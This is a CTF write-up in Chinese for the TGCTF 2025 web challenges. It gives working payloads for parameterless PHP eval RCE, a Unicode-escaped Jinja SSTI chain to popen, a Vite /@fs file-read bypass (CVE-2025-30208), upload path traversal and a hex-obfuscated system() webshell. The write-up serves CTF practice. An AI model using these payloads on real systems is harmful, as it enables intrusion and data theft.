TGCTF_web
AAA偷渡阴平
web签到1。简单的PHP特性,我的waf无懈可击!(bushi
1 |
|
考虑无参
?tgctf2025=eval(current(getallheaders()));
或者
1 | ?tgctf2025=eval(array_pop(next(get_defined_vars()))); |
AAA偷渡阴平(复仇)
ban了无参RCE,思考别的方法。
1 |
|
没有过滤session
1 | session_start();system(hex2bin(session_id())); |
直面天命
hint:
有一个由4个小写英文字母组成的路由,去那里看看吧,天命人!
写个字典爆破
1 | import itertools |
得到aazz
爆破参数 ffuf arjun burp都行
1 | /aazz?filename=/flag |
直面天命(复仇)
逃不脱,就带上金箍吧,重走一次西行路
(听说黄风大王戏份太多,我拿定风珠定住他了)
(原路由文件读取功能修改为源码展示)
1 | <pre>import os |
关键部分
简单ssti
八进制orUnicode
1 | {{''.__class__.__mro__[1].__subclasses__()[132].__init__.__globals__['popen']('whoami').read()}} |
1 | name=天命''['\u005F\u005F\u0063\u006C\u0061\u0073\u0073\u005F\u005F']['\u005F\u005F\u006D\u0072\u006F\u005F\u005F'][1]['\u005F\u005F\u0073\u0075\u0062\u0063\u006C\u0061\u0073\u0073\u0065\u0073\u005F\u005F']()[132]['\u005F\u005F\u0069\u006E\u0069\u0074\u005F\u005F']['\u005F\u005F\u0067\u006C\u006F\u0062\u0061\u006C\u0073\u005F\u005F']['\u0070\u006F\u0070\u0065\u006E']('nl /tgffff11111aaaaggggggg?')['\u0072\u0065\u0061\u0064']()难违 |
什么文件上传?
听说有个黑客在这个文件上传里面加料了?
1 | User-Agent: * |
class.php
1 |
|
构造pop链
1 |
|
什么文件上传?(复仇)
题目描述请看【web】什么文件上传? (plz再非我一次^ ^)
1 |
|
爆破出三个字母的后缀
exp同上
1 |
|
前端GAME/Plus
非常适合新生的前端小游戏,真的吗。
POC/wpoc/Vite开发服务器/Vite开发服务器任意文件读取漏洞(CVE-2025-30208).md at main · eeeeeeeeee-code/POC
结合提示flag位置读取即可
前端GAME ultra
server.fs.deny
bypassed with an invalid request-target
· Advisory · vitejs/vite
绕过app限制
1 | /@fs/app#/../tgflagggg |
(ez)upload
简单的文件上传
源码泄露
1 |
|
注意这句话
文件名可以覆盖,由于uploads目录是被限制了,所以通过../目录穿越到web目录
火眼辩魑魅
shell学姐会让青春CTF少年脸红吗?
1 |
|
十六进制绕过
shell=”\x73\x79\x73\x74\x65\x6d”(“nl /tgfffffllllaagggggg”);
直接蚁剑连也可以
TG_wordpress
本题可能无法继续解题
本题在赛时为出题人自行部署,赛后归档之后原题目环境可能不再可用,请参考主办方开源仓库自行搭建复现环境。
请不要向我们汇报此题环境无法访问!
WARN:后台管理请勿做任何修改的操作!
flag形式是TGCTF{CVE编号}
题目地址:http://101.37.149.223:33376/
(访问人数过多时,需等待服务器重启,可以先看其他题!)
TG_wordpress,wordpress中的战斗机!
hint1:如果账号密码存在于xml文件中,&会被转义为&,输入账密请用&
(若扫描器无法使用,请等待服务器访问人数减少,或者花费50pts购买hint)
1 | TGCTF{CVE-2020-25213} |
TGCTF 2025 后台管理
TeamGipsy队员不小心泄露了本届TGCTF的后台管理地址,还好管理员账户有强密码保护,暂时未造成威胁。 初始账号密码:tg/tg123 靶机地址:http://124.71.147.99:9045/ (禁止使用扫描器)
环境没了 没法看题了呜呜
熟悉的配方,熟悉的味道
简单的本地计算器,进行了严格安全验证,包严格的。
1 | from pyramid.config import Configurator |
1 | import requests |
打内存马
1 | http://127.0.0.1:57275/yiyi |
post
1 | code=__import__('os').popen('ls /').read() |
老登,炸鱼来了?
俺就一出题的,俺啥也不知道阿,俺以为是炸鱼老登呢,俺们都在用力的活着,你和gets将军说去吧。(需要让子弹飞一会)
hint1 :safe参数——2025-04-12 23:44 hint2 :竞争的思路是对的,但是脚本需要斟酌——2025-04-13 18:12
1 | package main |
1 | import requests |
来自